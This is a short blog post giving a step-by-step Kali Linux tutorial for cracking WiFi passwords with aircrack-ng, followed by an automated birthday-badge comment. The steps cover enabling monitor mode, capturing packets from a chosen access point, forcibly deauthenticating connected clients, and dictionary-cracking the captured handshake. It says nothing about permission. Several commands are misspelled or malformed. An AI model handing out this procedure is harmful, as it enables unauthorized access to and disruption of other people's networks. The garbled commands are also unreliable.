How to hack WiFi password (aircrack-ng)

in #wifi6 years ago

PicsArt_07-07-06.32.37-01.jpegWifi passwords crack on Kali Linux

Step-1: first open terminal we need to know the name of the wireless adapter connected has many adapter connected.
Command for this is iwconfig.

Step-2: for some wireless cards it gives error messages to enable monitor mode on wireless cards. for that you should use airmon-ng ckech kill .

Step-3: enable the monitor mode on the wireless card. Airmon-ng start wlan0 (interface of wireless card).

Step-4: airodump-ng wlan0mon, this will display all the access points in your surrounding and also the clients connected to that access points. Now this capture the packets in the air. This will gather data form the wireless packets in the air.

Step-5: Command is airodump-ng -c channel -bssid [basis of WiFi] -w [path to write the data of packets] wlan0mon [interface].
-w it is used to Witte the captured data to a specified path in my case it is '/root/desktop/hack' .

Step-6: deauthenticate the connected clients to the WiFi command is aireplay-ng-deauth 10 -a [router basis] interface .
-c ...(client mac) ........ Mac address

Step-7: start cracking the WiFi with captured packets command for this is aircrack-ng -b[bssid of router] -w [path to word list] [path to capture packets ].
-w path to word list it is '/root/desktop/word list.txt .
Note:- to use wordlist available in internet you can download them

Sort:  

Congratulations @manishsuthar07! You received a personal award!

Happy Birthday! - You are on the Steem blockchain for 1 year!

You can view your badges on your Steem Board and compare to others on the Steem Ranking

Vote for @Steemitboard as a witness to get one more award and increased upvotes!